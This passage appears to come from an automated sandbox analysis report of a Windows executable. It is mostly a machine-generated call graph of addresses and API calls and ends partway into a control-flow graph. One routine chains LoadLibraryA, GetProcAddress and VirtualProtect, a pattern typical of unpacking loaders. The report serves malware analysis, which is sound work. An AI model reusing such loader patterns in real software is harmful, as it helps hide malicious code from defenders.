84151->84318 84152 7ff633d63723 84316 7ff633d69300 CreateFileW GetFinalPathNameByHandleW CloseHandle 84152->84316 84157 7ff633d637b5 84154->84157 84156 7ff633d6378b 84156->84149 84319 7ff633d62810 49 API calls _log10_special 84156->84319 84157->84072 84164 7ff633d61950 84157->84164 84158 7ff633d63730 84159 7ff633d6374c __vcrt_FlsAlloc 84158->84159 84160 7ff633d63734 84158->84160 84159->84151 84317 7ff633d62810 49 API calls _log10_special 84160->84317 84163 7ff633d63745 84163->84149 84165 7ff633d645c0 108 API calls 84164->84165 84166 7ff633d61985 84165->84166 84168 7ff633d67f90 83 API calls 84166->84168 84173 7ff633d61c43 84166->84173 84167 7ff633d6c550 _log10_special 8 API calls 84169 7ff633d61c5e 84167->84169 84170 7ff633d619cb 84168->84170 84169->83998 84169->83999 84213 7ff633d61a03 84170->84213 84320 7ff633d706d4 84170->84320 84171 7ff633d7004c 74 API calls 84171->84173 84173->84167 84174 7ff633d619e5 84175 7ff633d619e9 84174->84175 84176 7ff633d61a08 84174->84176 84327 7ff633d74f08 11 API calls _get_daylight 84175->84327 84324 7ff633d7039c 84176->84324 84179 7ff633d619ee 84328 7ff633d62910 54 API calls _log10_special 84179->84328 84182 7ff633d61a26 84329 7ff633d74f08 11 API calls _get_daylight 84182->84329 84183 7ff633d61a45 84186 7ff633d61a7b 84183->84186 84187 7ff633d61a5c 84183->84187 84185 7ff633d61a2b 84330 7ff633d62910 54 API calls _log10_special 84185->84330 84190 7ff633d61c80 49 API calls 84186->84190 84331 7ff633d74f08 11 API calls _get_daylight 84187->84331 84192 7ff633d61a92 84190->84192 84191 7ff633d61a61 84332 7ff633d62910 54 API calls _log10_special 84191->84332 84194 7ff633d61c80 49 API calls 84192->84194 84195 7ff633d61add 84194->84195 84196 7ff633d706d4 73 API calls 84195->84196 84197 7ff633d61b01 84196->84197 84198 7ff633d61b16 84197->84198 84199 7ff633d61b35 84197->84199 84333 7ff633d74f08 11 API calls _get_daylight 84198->84333 84200 7ff633d7039c _fread_nolock 53 API calls 84199->84200 84203 7ff633d61b4a 84200->84203 84202 7ff633d61b1b 84334 7ff633d62910 54 API calls _log10_special 84202->84334 84205 7ff633d61b6f 84203->84205 84206 7ff633d61b50 84203->84206 84337 7ff633d70110 84205->84337 84335 7ff633d74f08 11 API calls _get_daylight 84206->84335 84209 7ff633d61b55 84336 7ff633d62910 54 API calls _log10_special 84209->84336 84213->84171 84215 7ff633d6883a 84214->84215 84216 7ff633d69390 2 API calls 84215->84216 84217 7ff633d68859 GetEnvironmentVariableW 84216->84217 84218 7ff633d68876 ExpandEnvironmentStringsW 84217->84218 84219 7ff633d688c2 84217->84219 84218->84219 84220 7ff633d68898 84218->84220 84221 7ff633d6c550 _log10_special 8 API calls 84219->84221 84375 7ff633d69440 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 84220->84375 84223 7ff633d688d4 84221->84223 84223->84008 84224 7ff633d688aa 84225 7ff633d6c550 _log10_special 8 API calls 84224->84225 84226 7ff633d688ba 84225->84226 84226->84008 84228 7ff633d693b2 MultiByteToWideChar 84227->84228 84230 7ff633d693d6 84227->84230 84229 7ff633d693ec __vcrt_freefls 84228->84229 84228->84230 84229->84069 84230->84229 84231 7ff633d693f3 MultiByteToWideChar 84230->84231 84231->84229 84376 7ff633d66360 84232->84376 84236 7ff633d63381 84240 7ff633d63399 84236->84240 84444 7ff633d66050 84236->84444 84238 7ff633d6338d 84238->84240 84453 7ff633d661e0 54 API calls 84238->84453 84304 7ff633d63670 FreeLibrary 84240->84304 84242 7ff633d61ca5 84241->84242 84592 7ff633d74984 84242->84592 84245->84015 84247 7ff633d645cc 84246->84247 84248 7ff633d69390 2 API calls 84247->84248 84249 7ff633d645f4 84248->84249 84250 7ff633d69390 2 API calls 84249->84250 84251 7ff633d64607 84250->84251 84619 7ff633d75f94 84251->84619 84254 7ff633d6c550 _log10_special 8 API calls 84255 7ff633d6392b 84254->84255 84255->84004 84256 7ff633d67f90 84255->84256 84257 7ff633d67fb4 84256->84257 84258 7ff633d706d4 73 API calls 84257->84258 84263 7ff633d6808b __vcrt_freefls 84257->84263 84259 7ff633d67fd0 84258->84259 84259->84263 84787 7ff633d778c8 84259->84787 84261 7ff633d706d4 73 API calls 84264 7ff633d67fe5 84261->84264 84262 7ff633d7039c _fread_nolock 53 API calls 84262->84264 84263->84009 84264->84261 84264->84262 84264->84263 84266 7ff633d7007c 84265->84266 84803 7ff633d6fe28 84266->84803 84268 7ff633d70095 84268->84004 84269->84072 84270->84072 84271->84019 84272->84023 84273->84028 84274->84030 84275->84044 84276->84072 84277->84049 84278->84072 84280 7ff633d6c559 84279->84280 84281 7ff633d6c8e0 IsProcessorFeaturePresent 84280->84281 84282 7ff633d63ca7 84280->84282 84283 7ff633d6c8f8 84281->84283 84282->84128 84815 7ff633d6cad8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 84283->84815 84285 7ff633d6c90b 84816 7ff633d6c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 84285->84816 84288->84059 84289->84072 84290->84046 84292 7ff633d61c80 49 API calls 84291->84292 84293 7ff633d64660 84292->84293 84293->84062 84294->84100 84295->84104 84296->84106 84297->84111 84298->84118 84299->84112 84300->84115 84301->84115 84302->84080 84304->84091 84305->84097 84306->84141 84307->84141 84309 7ff633d636bc GetModuleFileNameW 84308->84309 84309->84145 84309->84146 84311 7ff633d692bf FindClose 84310->84311 84312 7ff633d692d2 84310->84312 84311->84312 84313 7ff633d6c550 _log10_special 8 API calls 84312->84313 84314 7ff633d6371a 84313->84314 84314->84151 84314->84152 84315->84149 84316->84158 84317->84163 84318->84156 84319->84149 84321 7ff633d70704 84320->84321 84344 7ff633d70464 84321->84344 84323 7ff633d7071d 84323->84174 84357 7ff633d703bc 84324->84357 84327->84179 84328->84213 84329->84185 84330->84213 84331->84191 84332->84213 84333->84202 84334->84213 84335->84209 84336->84213 84338 7ff633d70119 84337->84338 84342 7ff633d61b89 84337->84342 84373 7ff633d74f08 11 API calls _get_daylight 84338->84373 84340 7ff633d7011e 84374 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84340->84374 84342->84213 84343 7ff633d62710 54 API calls _log10_special 84342->84343 84343->84213 84345 7ff633d704ce 84344->84345 84346 7ff633d7048e 84344->84346 84345->84346 84348 7ff633d704da 84345->84348 84356 7ff633d7a814 37 API calls 2 library calls 84346->84356 84355 7ff633d7546c EnterCriticalSection 84348->84355 84350 7ff633d704df 84351 7ff633d705e8 71 API calls 84350->84351 84352 7ff633d704f1 84351->84352 84353 7ff633d75478 _fread_nolock LeaveCriticalSection 84352->84353 84354 7ff633d704b5 84353->84354 84354->84323 84356->84354 84358 7ff633d703e6 84357->84358 84359 7ff633d61a20 84357->84359 84358->84359 84360 7ff633d703f5 memcpy_s 84358->84360 84361 7ff633d70432 84358->84361 84359->84182 84359->84183 84371 7ff633d74f08 11 API calls _get_daylight 84360->84371 84370 7ff633d7546c EnterCriticalSection 84361->84370 84364 7ff633d7043a 84366 7ff633d7013c _fread_nolock 51 API calls 84364->84366 84365 7ff633d7040a 84372 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84365->84372 84368 7ff633d70451 84366->84368 84369 7ff633d75478 _fread_nolock LeaveCriticalSection 84368->84369 84369->84359 84371->84365 84372->84359 84373->84340 84374->84342 84375->84224 84377 7ff633d66375 84376->84377 84378 7ff633d61c80 49 API calls 84377->84378 84379 7ff633d663b1 84378->84379 84380 7ff633d663ba 84379->84380 84381 7ff633d663dd 84379->84381 84464 7ff633d62710 54 API calls _log10_special 84380->84464 84382 7ff633d64630 49 API calls 84381->84382 84384 7ff633d663f5 84382->84384 84385 7ff633d66413 84384->84385 84465 7ff633d62710 54 API calls _log10_special 84384->84465 84454 7ff633d64560 84385->84454 84388 7ff633d6c550 _log10_special 8 API calls 84390 7ff633d6336e 84388->84390 84390->84240 84407 7ff633d66500 84390->84407 84391 7ff633d6642b 84393 7ff633d64630 49 API calls 84391->84393 84392 7ff633d68e80 3 API calls 84392->84391 84394 7ff633d66444 84393->84394 84395 7ff633d66469 84394->84395 84396 7ff633d66449 84394->84396 84460 7ff633d68e80 84395->84460 84466 7ff633d62710 54 API calls _log10_special 84396->84466 84399 7ff633d66476 84400 7ff633d66482 84399->84400 84401 7ff633d664c1 84399->84401 84402 7ff633d69390 2 API calls 84400->84402 84468 7ff633d65830 137 API calls 84401->84468 84404 7ff633d6649a GetLastError 84402->84404 84467 7ff633d62c50 51 API calls _log10_special 84404->84467 84406 7ff633d663d3 84406->84388 84469 7ff633d65400 84407->84469 84409 7ff633d66526 84410 7ff633d6653f 84409->84410 84411 7ff633d6652e 84409->84411 84476 7ff633d64c90 84410->84476 84494 7ff633d62710 54 API calls _log10_special 84411->84494 84415 7ff633d6654b 84495 7ff633d62710 54 API calls _log10_special 84415->84495 84416 7ff633d6655c 84419 7ff633d6656c 84416->84419 84421 7ff633d6657d 84416->84421 84418 7ff633d6653a 84418->84236 84496 7ff633d62710 54 API calls _log10_special 84419->84496 84422 7ff633d665ad 84421->84422 84423 7ff633d6659c 84421->84423 84425 7ff633d665cd 84422->84425 84426 7ff633d665bc 84422->84426 84497 7ff633d62710 54 API calls _log10_special 84423->84497 84480 7ff633d64d50 84425->84480 84498 7ff633d62710 54 API calls _log10_special 84426->84498 84430 7ff633d665ed 84433 7ff633d6660d 84430->84433 84434 7ff633d665fc 84430->84434 84431 7ff633d665dc 84499 7ff633d62710 54 API calls _log10_special 84431->84499 84436 7ff633d6661f 84433->84436 84438 7ff633d66630 84433->84438 84500 7ff633d62710 54 API calls _log10_special 84434->84500 84501 7ff633d62710 54 API calls _log10_special 84436->84501 84440 7ff633d6665a 84438->84440 84502 7ff633d772b0 73 API calls 84438->84502 84440->84418 84504 7ff633d62710 54 API calls _log10_special 84440->84504 84441 7ff633d66648 84503 7ff633d772b0 73 API calls 84441->84503 84445 7ff633d66070 84444->84445 84445->84445 84446 7ff633d66099 84445->84446 84447 7ff633d660b0 __vcrt_freefls 84445->84447 84536 7ff633d62710 54 API calls _log10_special 84446->84536 84451 7ff633d62710 54 API calls 84447->84451 84452 7ff633d661bb 84447->84452 84506 7ff633d61470 84447->84506 84449 7ff633d660a5 84449->84238 84451->84447 84452->84238 84453->84240 84455 7ff633d6456a 84454->84455 84456 7ff633d69390 2 API calls 84455->84456 84457 7ff633d6458f 84456->84457 84458 7ff633d6c550 _log10_special 8 API calls 84457->84458 84459 7ff633d645b7 84458->84459 84459->84391 84459->84392 84461 7ff633d69390 2 API calls 84460->84461 84462 7ff633d68e94 LoadLibraryExW 84461->84462 84463 7ff633d68eb3 __vcrt_freefls 84462->84463 84463->84399 84464->84406 84465->84385 84466->84406 84467->84406 84468->84406 84470 7ff633d6542c 84469->84470 84471 7ff633d65434 84470->84471 84472 7ff633d655d4 84470->84472 84505 7ff633d76aa4 48 API calls 84470->84505 84471->84409 84473 7ff633d65797 __vcrt_freefls 84472->84473 84474 7ff633d647d0 47 API calls 84472->84474 84473->84409 84474->84472 84477 7ff633d64cc0 84476->84477 84478 7ff633d6c550 _log10_special 8 API calls 84477->84478 84479 7ff633d64d2a 84478->84479 84479->84415 84479->84416 84481 7ff633d64d65 84480->84481 84482 7ff633d61c80 49 API calls 84481->84482 84483 7ff633d64db1 84482->84483 84484 7ff633d61c80 49 API calls 84483->84484 84493 7ff633d64e33 __vcrt_freefls 84483->84493 84485 7ff633d64df0 84484->84485 84488 7ff633d69390 2 API calls 84485->84488 84485->84493 84486 7ff633d6c550 _log10_special 8 API calls 84487 7ff633d64e7e 84486->84487 84487->84430 84487->84431 84489 7ff633d64e06 84488->84489 84490 7ff633d69390 2 API calls 84489->84490 84491 7ff633d64e1d 84490->84491 84492 7ff633d69390 2 API calls 84491->84492 84492->84493 84493->84486 84494->84418 84495->84418 84496->84418 84497->84418 84498->84418 84499->84418 84500->84418 84501->84418 84502->84441 84503->84440 84504->84418 84505->84470 84507 7ff633d645c0 108 API calls 84506->84507 84508 7ff633d61493 84507->84508 84509 7ff633d6149b 84508->84509 84510 7ff633d614bc 84508->84510 84559 7ff633d62710 54 API calls _log10_special 84509->84559 84512 7ff633d706d4 73 API calls 84510->84512 84514 7ff633d614d1 84512->84514 84513 7ff633d614ab 84513->84447 84515 7ff633d614f8 84514->84515 84516 7ff633d614d5 84514->84516 84520 7ff633d61508 84515->84520 84521 7ff633d61532 84515->84521 84560 7ff633d74f08 11 API calls _get_daylight 84516->84560 84518 7ff633d614da 84561 7ff633d62910 54 API calls _log10_special 84518->84561 84562 7ff633d74f08 11 API calls _get_daylight 84520->84562 84523 7ff633d61538 84521->84523 84531 7ff633d6154b 84521->84531 84537 7ff633d61210 84523->84537 84524 7ff633d61510 84563 7ff633d62910 54 API calls _log10_special 84524->84563 84526 7ff633d614f3 __vcrt_freefls 84528 7ff633d7004c 74 API calls 84526->84528 84530 7ff633d615c4 84528->84530 84529 7ff633d7039c _fread_nolock 53 API calls 84529->84531 84530->84447 84531->84526 84531->84529 84532 7ff633d615d6 84531->84532 84564 7ff633d74f08 11 API calls _get_daylight 84532->84564 84534 7ff633d615db 84565 7ff633d62910 54 API calls _log10_special 84534->84565 84536->84449 84538 7ff633d61268 84537->84538 84539 7ff633d61297 84538->84539 84540 7ff633d6126f 84538->84540 84543 7ff633d612d4 84539->84543 84544 7ff633d612b1 84539->84544 84570 7ff633d62710 54 API calls _log10_special 84540->84570 84542 7ff633d61282 84542->84526 84548 7ff633d612e6 84543->84548 84554 7ff633d61309 memcpy_s 84543->84554 84571 7ff633d74f08 11 API calls _get_daylight 84544->84571 84546 7ff633d612b6 84572 7ff633d62910 54 API calls _log10_special 84546->84572 84573 7ff633d74f08 11 API calls _get_daylight 84548->84573 84550 7ff633d7039c _fread_nolock 53 API calls 84550->84554 84551 7ff633d612eb 84574 7ff633d62910 54 API calls _log10_special 84551->84574 84553 7ff633d612cf __vcrt_freefls 84553->84526 84554->84550 84554->84553 84557 7ff633d613cf 84554->84557 84558 7ff633d70110 37 API calls 84554->84558 84566 7ff633d70adc 84554->84566 84575 7ff633d62710 54 API calls _log10_special 84557->84575 84558->84554 84559->84513 84560->84518 84561->84526 84562->84524 84563->84526 84564->84534 84565->84526 84567 7ff633d70b0c 84566->84567 84576 7ff633d7082c 84567->84576 84569 7ff633d70b2a 84569->84554 84570->84542 84571->84546 84572->84553 84573->84551 84574->84553 84575->84553 84577 7ff633d7084c 84576->84577 84578 7ff633d70879 84576->84578 84577->84578 84579 7ff633d70856 84577->84579 84580 7ff633d70881 84577->84580 84578->84569 84590 7ff633d7a814 37 API calls 2 library calls 84579->84590 84583 7ff633d7076c 84580->84583 84591 7ff633d7546c EnterCriticalSection 84583->84591 84585 7ff633d70789 84586 7ff633d707ac 74 API calls 84585->84586 84587 7ff633d70792 84586->84587 84588 7ff633d75478 _fread_nolock LeaveCriticalSection 84587->84588 84589 7ff633d7079d 84588->84589 84589->84578 84590->84578 84595 7ff633d749de 84592->84595 84593 7ff633d74a03 84610 7ff633d7a814 37 API calls 2 library calls 84593->84610 84595->84593 84596 7ff633d74a3f 84595->84596 84611 7ff633d72c10 49 API calls _invalid_parameter_noinfo 84596->84611 84598 7ff633d74b1c 84601 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 84598->84601 84599 7ff633d74a2d 84600 7ff633d6c550 _log10_special 8 API calls 84599->84600 84602 7ff633d61cc8 84600->84602 84601->84599 84602->84003 84603 7ff633d74ad6 84603->84598 84604 7ff633d74b40 84603->84604 84605 7ff633d74af1 84603->84605 84608 7ff633d74ae8 84603->84608 84604->84598 84606 7ff633d74b4a 84604->84606 84612 7ff633d7a948 84605->84612 84609 7ff633d7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 84606->84609 84608->84598 84608->84605 84609->84599 84610->84599 84611->84603 84613 7ff633d7a94d RtlFreeHeap 84612->84613 84614 7ff633d7a97c 84612->84614 84613->84614 84615 7ff633d7a968 GetLastError 84613->84615 84614->84599 84616 7ff633d7a975 Concurrency::details::SchedulerProxy::DeleteThis 84615->84616 84618 7ff633d74f08 11 API calls _get_daylight 84616->84618 84618->84614 84620 7ff633d75ec8 84619->84620 84621 7ff633d75eee 84620->84621 84624 7ff633d75f21 84620->84624 84650 7ff633d74f08 11 API calls _get_daylight 84621->84650 84623 7ff633d75ef3 84651 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84623->84651 84626 7ff633d75f27 84624->84626 84627 7ff633d75f34 84624->84627 84652 7ff633d74f08 11 API calls _get_daylight 84626->84652 84638 7ff633d7ac28 84627->84638 84628 7ff633d64616 84628->84254 84632 7ff633d75f48 84653 7ff633d74f08 11 API calls _get_daylight 84632->84653 84633 7ff633d75f55 84645 7ff633d7fecc 84633->84645 84636 7ff633d75f68 84654 7ff633d75478 LeaveCriticalSection 84636->84654 84655 7ff633d802d8 EnterCriticalSection 84638->84655 84640 7ff633d7ac3f 84641 7ff633d7ac9c 19 API calls 84640->84641 84642 7ff633d7ac4a 84641->84642 84643 7ff633d80338 _isindst LeaveCriticalSection 84642->84643 84644 7ff633d75f3e 84643->84644 84644->84632 84644->84633 84656 7ff633d7fbc8 84645->84656 84648 7ff633d7ff26 84648->84636 84650->84623 84651->84628 84652->84628 84653->84628 84657 7ff633d7fc03 __vcrt_FlsAlloc 84656->84657 84658 7ff633d7fdca 84657->84658 84671 7ff633d77a3c 51 API calls 3 library calls 84657->84671 84662 7ff633d7fdd3 84658->84662 84674 7ff633d74f08 11 API calls _get_daylight 84658->84674 84660 7ff633d7fea1 84675 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84660->84675 84662->84648 84668 7ff633d86d54 84662->84668 84664 7ff633d7fe35 84664->84658 84672 7ff633d77a3c 51 API calls 3 library calls 84664->84672 84666 7ff633d7fe54 84666->84658 84673 7ff633d77a3c 51 API calls 3 library calls 84666->84673 84676 7ff633d86354 84668->84676 84671->84664 84672->84666 84673->84658 84674->84660 84675->84662 84677 7ff633d8636b 84676->84677 84678 7ff633d86389 84676->84678 84730 7ff633d74f08 11 API calls _get_daylight 84677->84730 84678->84677 84681 7ff633d863a5 84678->84681 84680 7ff633d86370 84731 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84680->84731 84687 7ff633d86964 84681->84687 84684 7ff633d8637c 84684->84648 84733 7ff633d86698 84687->84733 84690 7ff633d869d9 84765 7ff633d74ee8 11 API calls _get_daylight 84690->84765 84691 7ff633d869f1 84753 7ff633d78520 84691->84753 84704 7ff633d863d0 84704->84684 84732 7ff633d784f8 LeaveCriticalSection 84704->84732 84710 7ff633d869de 84766 7ff633d74f08 11 API calls _get_daylight 84710->84766 84730->84680 84731->84684 84734 7ff633d866c4 84733->84734 84738 7ff633d866de 84733->84738 84734->84738 84778 7ff633d74f08 11 API calls _get_daylight 84734->84778 84736 7ff633d866d3 84779 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84736->84779 84740 7ff633d8675c 84738->84740 84780 7ff633d74f08 11 API calls _get_daylight 84738->84780 84739 7ff633d867ad 84749 7ff633d8680a 84739->84749 84784 7ff633d79b78 37 API calls 2 library calls 84739->84784 84740->84739 84782 7ff633d74f08 11 API calls _get_daylight 84740->84782 84743 7ff633d86806 84746 7ff633d86888 84743->84746 84743->84749 84744 7ff633d867a2 84783 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84744->84783 84785 7ff633d7a900 17 API calls __GetCurrentState 84746->84785 84748 7ff633d86751 84781 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84748->84781 84749->84690 84749->84691 84786 7ff633d802d8 EnterCriticalSection 84753->84786 84765->84710 84766->84704 84778->84736 84779->84738 84780->84748 84781->84740 84782->84744 84783->84739 84784->84743 84788 7ff633d778f8 84787->84788 84791 7ff633d773d4 84788->84791 84790 7ff633d77911 84790->84264 84792 7ff633d7741e 84791->84792 84793 7ff633d773ef 84791->84793 84801 7ff633d7546c EnterCriticalSection 84792->84801 84802 7ff633d7a814 37 API calls 2 library calls 84793->84802 84796 7ff633d77423 84797 7ff633d77440 38 API calls 84796->84797 84798 7ff633d7742f 84797->84798 84799 7ff633d75478 _fread_nolock LeaveCriticalSection 84798->84799 84800 7ff633d7740f 84799->84800 84800->84790 84802->84800 84804 7ff633d6fe43 84803->84804 84805 7ff633d6fe71 84803->84805 84814 7ff633d7a814 37 API calls 2 library calls 84804->84814 84812 7ff633d6fe63 84805->84812 84813 7ff633d7546c EnterCriticalSection 84805->84813 84808 7ff633d6fe88 84809 7ff633d6fea4 72 API calls 84808->84809 84810 7ff633d6fe94 84809->84810 84811 7ff633d75478 _fread_nolock LeaveCriticalSection 84810->84811 84811->84812 84812->84268 84814->84812 84815->84285 84887 7ff633d75628 84888 7ff633d75642 84887->84888 84889 7ff633d7565f 84887->84889 84912 7ff633d74ee8 11 API calls _get_daylight 84888->84912 84889->84888 84891 7ff633d75672 CreateFileW 84889->84891 84893 7ff633d756dc 84891->84893 84894 7ff633d756a6 84891->84894 84892 7ff633d75647 84913 7ff633d74f08 11 API calls _get_daylight 84892->84913 84916 7ff633d75c04 46 API calls 3 library calls 84893->84916 84915 7ff633d7577c 59 API calls 3 library calls 84894->84915 84898 7ff633d756e1 84901 7ff633d756e5 84898->84901 84902 7ff633d75710 84898->84902 84899 7ff633d7564f 84914 7ff633d7a8e0 37 API calls _invalid_parameter_noinfo 84899->84914 84900 7ff633d756b4 84904 7ff633d756bb CloseHandle 84900->84904 84905 7ff633d756d1 CloseHandle 84900->84905 84917 7ff633d74e7c 11 API calls 2 library calls 84901->84917 84918 7ff633d759c4 51 API calls 84902->84918 84906 7ff633d7565a 84904->84906 84905->84906 84909 7ff633d7571d 84919 7ff633d75b00 21 API calls _fread_nolock 84909->84919 84911 7ff633d756ef 84911->84906 84912->84892 84913->84899 84914->84906 84915->84900 84916->84898 84917->84911 84918->84909 84919->84911 84817 7ffdfaeaf790 84818 7ffdfaeaf7aa 84817->84818 84819 7ffdfaeaf7c0 84818->84819 84821 7ffdfae81f32 84818->84821 84821->84819 84822 7ffdfae98290 84821->84822 84823 7ffdfae982aa SetLastError 84822->84823 84824 7ffdfae982d1 84823->84824 84827 7ffdfae82347 84824->84827 84825 7ffdfae982f5 84825->84819 84827->84825 84829 7ffdfae8d370 84827->84829 84830 7ffdfae8d3f5 84829->84830 84831 7ffdfae8d4e5 84829->84831 84833 7ffdfae81253 84829->84833 84830->84825 84831->84830 84832 7ffdfae81253 SetLastError 84831->84832 84832->84831 84833->84831 84834 7ffdfae8dc10 84833->84834 84835 7ffdfae8dc8e SetLastError 84834->84835 84836 7ffdfae8dce6 84834->84836 84835->84834 84835->84836 84836->84831 84920 7ffdfaeaeb80 84922 7ffdfaeaeb9a 84920->84922 84921 7ffdfaeaebb0 84922->84921 84924 7ffdfae8110e 84922->84924 84924->84921 84925 7ffdfae97dc0 84924->84925 84928 7ffdfae97df0 84925->84928 84927 7ffdfae97dda 84927->84921 84929 7ffdfae812ee 84928->84929 84930 7ffdfae97e10 SetLastError 84929->84930 84931 7ffdfae97e37 84930->84931 84934 7ffdfae81b4a 84931->84934 84932 7ffdfae97e79 84932->84927 84934->84932 84937 7ffdfae8c350 84934->84937 84935 7ffdfae8c42f 84935->84932 84937->84935 84941 7ffdfae8195b 84937->84941 84951 7ffdfae81cf8 84937->84951 84957 7ffdfaec652a 84937->84957 84963 7ffdfae8146a 84937->84963 84941->84937 84943 7ffdfae90060 84941->84943 84942 7ffdfae81497 SetLastError 84942->84943 84943->84942 84944 7ffdfae90cb2 84943->84944 84950 7ffdfae901d4 84943->84950 84945 7ffdfae90cbf 00007FFE1FFB6570 84944->84945 84944->84950 84946 7ffdfae90ce0 00007FFE1FFB6570 84945->84946 84945->84950 84947 7ffdfae90d00 00007FFE1FFB6570 84946->84947 84946->84950 84948 7ffdfae90d1b 00007FFE1FFB6570 84947->84948 84947->84950 84949 7ffdfae90d33 00007FFE1FFB6570 84948->84949 84948->84950 84949->84950 84950->84937 84951->84937 84952 7ffdfaec5f60 84951->84952 84953 7ffdfaec667f SetLastError 84952->84953 84955 7ffdfaec676a 84952->84955 84956 7ffdfaec6693 84953->84956 84955->84937 84956->84955 84969 7ffdfaec6140 84956->84969 84958 7ffdfaec6640 84957->84958 84959 7ffdfaec667f SetLastError 84958->84959 84962 7ffdfaec676a 84958->84962 84960 7ffdfaec6693 84959->84960 84961 7ffdfaec6140 00007FFE13331210 84960->84961 84960->84962 84961->84960 84962->84937 84963->84937 84964 7ffdfaec5e40 84963->84964 84965 7ffdfaec667f SetLastError 84964->84965 84967 7ffdfaec676a 84964->84967 84968 7ffdfaec6693 84965->84968 84966 7ffdfaec6140 00007FFE13331210 84966->84968 84967->84937 84968->84966 84968->84967 84971 7ffdfaec615a 84969->84971 84972 7ffdfaec63df 84971->84972 84973 7ffdfae8119f 00007FFE13331210 84971->84973 84972->84956 84973->84971 84974 7ffdfaea70c0 84975 7ffdfaea70d0 84974->84975 84976 7ffdfaea70e0 84975->84976 84977 7ffdfaec652a 2 API calls 84975->84977 84978 7ffdfae8146a 2 API calls 84975->84978 84979 7ffdfae81cf8 2 API calls 84975->84979 84977->84976 84978->84976 84979->84976 84837 7ffdfb293230 84838 7ffdfb293248 84837->84838 84839 7ffdfb293dd1 84837->84839 84840 7ffdfb293cde LoadLibraryA 84838->84840 84843 7ffdfb293d39 VirtualProtect VirtualProtect 84838->84843 84841 7ffdfb293cf8 84840->84841 84841->84838 84844 7ffdfb293d17 GetProcAddress 84841->84844 84843->84839 84844->84841 84845 7ffdfb293d2e 84844->84845 84846 7ffdfae8b370 84849 7ffdfae8b38f 84846->84849 84847 7ffdfae81253 SetLastError 84848 7ffdfae8b4f2 84847->84848 84849->84847 84849->84848 84850 7ff633d62fe0 84851 7ff633d62ff0 84850->84851 84852 7ff633d6302b 84851->84852 84853 7ff633d63041 84851->84853 84878 7ff633d62710 54 API calls _log10_special 84852->84878 84856 7ff633d63061 84853->84856 84860 7ff633d63077 __vcrt_freefls 84853->84860 84855 7ff633d63037 __vcrt_freefls 84858 7ff633d6c550 _log10_special 8 API calls 84855->84858 84879 7ff633d62710 54 API calls _log10_special 84856->84879 84859 7ff633d631fa 84858->84859 84860->84855 84861 7ff633d61470 116 API calls 84860->84861 84862 7ff633d63349 84860->84862 84863 7ff633d61c80 49 API calls 84860->84863 84865 7ff633d63333 84860->84865 84867 7ff633d6330d 84860->84867 84869 7ff633d63207 84860->84869 84861->84860 84886 7ff633d62710 54 API calls _log10_special 84862->84886 84863->84860 84885 7ff633d62710 54 API calls _log10_special 84865->84885 84884 7ff633d62710 54 API calls _log10_special 84867->84884 84870 7ff633d63273 84869->84870 84880 7ff633d7a404 37 API calls 2 library calls 84869->84880 84872 7ff633d6329e 84870->84872 84873 7ff633d63290 84870->84873 84882 7ff633d62dd0 37 API calls 84872->84882 84881 7ff633d7a404 37 API calls 2 library calls 84873->84881 84876 7ff633d6329c 84883 7ff633d62500 54 API calls __vcrt_freefls 84876->84883 84878->84855 84879->84855 84880->84870 84881->84876 84882->84876 84883->84855 84884->84855 84885->84855 84886->84855 84980 7ffdfaed7820 84981 7ffdfaed7838 84980->84981 84982 7ffdfaed7946 84981->84982 84983 7ffdfae81b4a 10 API calls 84981->84983 84983->84981

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FF633D61000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 0 7ff633d61000-7ff633d63806 call 7ff633d6fe18 call 7ff633d6fe20 call 7ff633d6c850 call 7ff633d753f0 call 7ff633d75484 call 7ff633d636b0 14 7ff633d63808-7ff633d6380f 0->14 15 7ff633d63814-7ff633d63836 call 7ff633d61950 0->15 16 7ff633d63c97-7ff633d63cb2 call 7ff633d6c550 14->16 21 7ff633d6391b-7ff633d63931 call 7ff633d645c0 15->21 22 7ff633d6383c-7ff633d63856 call 7ff633d61c80 15->22 27 7ff633d6396a-7ff633d6397f call 7ff633d62710 21->27 28 7ff633d63933-7ff633d63960 call 7ff633d67f90 21->28 26 7ff633d6385b-7ff633d6389b call 7ff633d68830 22->26 35 7ff633d6389d-7ff633d638a3 26->35 36 7ff633d638c1-7ff633d638cc call 7ff633d74f30 26->36 42 7ff633d63c8f 27->42 40 7ff633d63962-7ff633d63965 call 7ff633d7004c 28->40 41 7ff633d63984-7ff633d639a6 call 7ff633d61c80 28->41 37 7ff633d638a5-7ff633d638ad 35->37 38 7ff633d638af-7ff633d638bd call 7ff633d689a0 35->38 48 7ff633d639fc-7ff633d63a2a call 7ff633d68940 call 7ff633d689a0 * 3 36->48 49 7ff633d638d2-7ff633d638e1 call 7ff633d68830 36->49 37->38 38->36 40->27 53 7ff633d639b0-7ff633d639b9 41->53 42->16 75 7ff633d63a2f-7ff633d63a3e call 7ff633d68830 48->75 59 7ff633d638e7-7ff633d638ed 49->59 60 7ff633d639f4-7ff633d639f7 call 7ff633d74f30 49->60 53->53 54 7ff633d639bb-7ff633d639d8 call 7ff633d61950 53->54 54->26 65 7ff633d639de-7ff633d639ef call 7ff633d62710 54->65 63 7ff633d638f0-7ff633d638fc 59->63 60->48 67 7ff633d63905-7ff633d63908 63->67 68 7ff633d638fe-7ff633d63903 63->68 65->42 67->60 71 7ff633d6390e-7ff633d63916 call 7ff633d74f30 67->71 68->63 68->67 71->75 79 7ff633d63b45-7ff633d63b53 75->79 80 